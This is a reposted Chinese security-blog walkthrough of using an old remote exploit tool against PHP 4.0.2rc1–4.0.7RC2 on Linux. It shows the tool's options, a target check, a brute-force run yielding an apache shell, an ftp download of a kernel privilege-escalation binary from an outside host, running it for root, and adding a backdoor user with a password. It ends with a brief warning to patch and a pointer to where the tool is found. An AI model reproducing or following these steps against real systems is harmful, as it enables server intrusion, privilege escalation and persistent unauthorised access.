[转载]通过PHP v4.0.2rc1-v4.0.7RC2 exploit program拿到root

信息来源：Neeao's Security Blog

从一台被黑的服务器上找到了如下工具
fun
此工具专门用来扫描PHP
v4.0.2rc1-v4.0.7RC2的exploit程序。找到后通过溢出远程得到一个shell，得到root权限就更简单了。用法如下：
[root at linux_server tmp]# dot /fun
7350fun - x86/linux mod_php
v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
usage: ./fun [options]
Options:
-c check exploitability only, do not exploit
-n no check
mode
-s start bruteforce start (top)
-t target choose target
(1) PHP
v4.0.2rc1-v4.0.5
(2) PHP v4.0.6-v4.0.7RC2
经过测试，可以获得一个apache权限的远程shell。
然后通过内核溢出程序可以得到本地root了。经过测试Redhat 7.2 服务器得到root权限。
方法如下：
[bob at bob linux_server]$ dot /fun -c 202.x.x.x /login.php (验证服务器的php版本)
7350fun -
x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6
(4.0.6，属于可以攻击范围 )
[bob at bob linux_server]$ dot /fun -t 2 202.x.x.x
/login.php
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote
exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says
PHP/4.0.6
+ exploiting the bug now...
[+++-------] trying: bffffecc (开始不断的发送溢出代码到remote
server)
[++++++++
[++++++++++
[+++++++---] trying:
bffffe80
[+++++++++
[++++++++++] trying: bffffde8
[+---------] trying:
bffffde4
[++
[+++++++---] trying: bffffc70
[++++++++
[++++++----] trying: bffff9d4
[+++++++
[++++++++
[+++++-----]
trying: bffff9a0
[++++++
[+++++++
[++++++++++] trying:
bffff688
[++++++++++] trying: bffff5dc
+ done ... (一个半小时后，系统告诉我成功了) :P
+ you should be connected to a dup-shell now
+ if not simply try
again
command>
Linux manson 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31 EDT
2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
(我已经远程登录进来了)

ls (敲个ls
,下面就是系统的目录)
bin
boot
dev
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
cd
/tmp
ftp 219.x.x.x (去拿内核溢出代码 for
2.4.7-10)
bob
Password:buyllshit
Name (219.x.x.x:apache): Not logged
in. (丫的密码敲错了)
Login failed.
by
ftp
219.x.x.x
bob
Password:bullshit (这回正确了)
cd backdoot
Name
(219.x.x.x:apache): /backdoot: No such file or directory. (目录敲错了)
cd
backdoor
get xp (拿到内核本地溢出程序了)
by
chmod +x xp (放在tmp目录下面，给xp程序加可执行权限)
./xp
[+] Attached to
17306
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait
for suid shell... (溢出成功)
useradd bob
/bin/sh: useradd: command not found (应该是我的path没有
/usr/sbin,那我直接去找好了)
locate
useradd
/etc/default/useradd
/usr/sbin/useradd
/usr/share/man/man8/useradd.8.gz
cd
/usr/sbin
./useradd bob (加好了bob)
passwd bob
New password:
bullshit
BAD PASSWORD: it is based on a dictionary word
Retype new
password: bullshit
Changing password for user bob
passwd: all
authentication tokens updated successfully (密码更改成功)
exit
exit
接下来的动作就不需要我重复了，自己用secure
CRT软件ssh
登陆你刚才设定好的用户名跟密码。然后还是执行那个xp程序，你就是root了。
此程序比较老了，我也是最近研究一台被入侵的服务器才发现此工具的。
而且我从http://packetstormsecurity.org
也找到了此程序。
目前国内不少服务器还使用着如上有问题的PHP版本，所以需要抓紧更新了